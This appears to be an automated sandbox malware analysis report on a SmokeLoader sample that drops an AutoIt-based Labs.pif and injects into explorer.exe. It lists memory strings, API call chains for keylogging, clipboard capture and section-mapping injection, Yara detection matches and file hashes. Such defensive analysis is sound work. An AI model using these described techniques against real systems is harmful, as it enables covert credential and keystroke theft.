Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001C.00000000.2310676294.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2491730290.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Orders.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp, Labs.pif.2.dr, Orders.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000001C.00000000.2299433125.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2481065121.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 0000001C.00000002.2481065121.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: unknown

HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.7:49703 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe

Code function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056E5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		19_2_007E4830
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		27_2_007E4830

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007E4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

19_2_007E4632

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

19_2_007D0508

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		19_2_007FD164
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		27_2_007FD164

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00402F13 RtlCreateUserThread,NtTerminateProcess,	27_2_00402F13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0040259B NtEnumerateKey,	27_2_0040259B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_004014B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	27_2_004014B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00403251 MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,	27_2_00403251
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00402F71 RtlCreateUserThread,NtTerminateProcess,	27_2_00402F71
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_004014CD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	27_2_004014CD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_004014E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	27_2_004014E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_004014F3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	27_2_004014F3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_004014BB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	27_2_004014BB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007D4254: CreateFileW,DeviceIoControl,CloseHandle,

19_2_007D4254

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif

Code function: 19_2_007C8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

19_2_007C8F2E

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_004034FC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	19_2_007D5778
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	27_2_007D5778

Source: C:\Users\user\Desktop\lSmb6nDsrC.exe	Code function: 0_2_00406C3F	0_2_00406C3F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0077B020	19_2_0077B020
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00779C80	19_2_00779C80
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007923F5	19_2_007923F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007F8400	19_2_007F8400
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007A6502	19_2_007A6502
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007A265E	19_2_007A265E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0077E6F0	19_2_0077E6F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079282A	19_2_0079282A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007A89BF	19_2_007A89BF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007A6A74	19_2_007A6A74
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007F0A3A	19_2_007F0A3A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00780BE0	19_2_00780BE0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079CD51	19_2_0079CD51
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007CEDB2	19_2_007CEDB2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007D8E44	19_2_007D8E44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007F0EB7	19_2_007F0EB7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007A6FE6	19_2_007A6FE6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007933B7	19_2_007933B7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0078D45D	19_2_0078D45D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079F409	19_2_0079F409
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007794E0	19_2_007794E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00771663	19_2_00771663
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0078F628	19_2_0078F628
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007916B4	19_2_007916B4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0077F6A0	19_2_0077F6A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007978C3	19_2_007978C3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00791BA8	19_2_00791BA8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079DBA5	19_2_0079DBA5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_007A9CE5	19_2_007A9CE5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0078DD28	19_2_0078DD28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_0079BFD6	19_2_0079BFD6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 19_2_00791FC0	19_2_00791FC0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007923F5	27_2_007923F5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007F8400	27_2_007F8400
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007A6502	27_2_007A6502
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007A265E	27_2_007A265E
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0077E6F0	27_2_0077E6F0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079282A	27_2_0079282A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007A89BF	27_2_007A89BF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007A6A74	27_2_007A6A74
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007F0A3A	27_2_007F0A3A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00780BE0	27_2_00780BE0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079CD51	27_2_0079CD51
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007CEDB2	27_2_007CEDB2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007D8E44	27_2_007D8E44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007F0EB7	27_2_007F0EB7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007A6FE6	27_2_007A6FE6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0077B020	27_2_0077B020
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007933B7	27_2_007933B7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0078D45D	27_2_0078D45D
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079F409	27_2_0079F409
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007794E0	27_2_007794E0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00771663	27_2_00771663
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0078F628	27_2_0078F628
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007916B4	27_2_007916B4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0077F6A0	27_2_0077F6A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007978C3	27_2_007978C3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00791BA8	27_2_00791BA8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079DBA5	27_2_0079DBA5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_007A9CE5	27_2_007A9CE5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00779C80	27_2_00779C80
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0078DD28	27_2_0078DD28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_0079BFD6	27_2_0079BFD6
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: 27_2_00791FC0	27_2_00791FC0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00772111 appears 38 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00781CB6 appears 50 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 007A1B70 appears 60 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00790D17 appears 140 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 0079312D appears 42 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00781A36 appears 68 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00799FA5 appears 46 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00798B30 appears 84 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 00774DC0 appears 38 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif	Code function: String function: 007939FB appears 36 times

Source: lSmb6nDsrC.exe

Static PE information: invalid certificate

Source: lSmb6nDsrC.exe, 00000000.00000003.1325675607.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs lSmb6nDsrC.exe
Source: lSmb6nDsrC.exe, 00000000.00000003.1239683585.000000000282A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAutoIt3.exeB vs lSmb6nDsrC.exe
Source: lSmb6nDsrC.exe, 00000000.00000002.1326164845.0000000000703000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs lSmb6nDsrC.exe

Source: lSmb6nDsrC.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
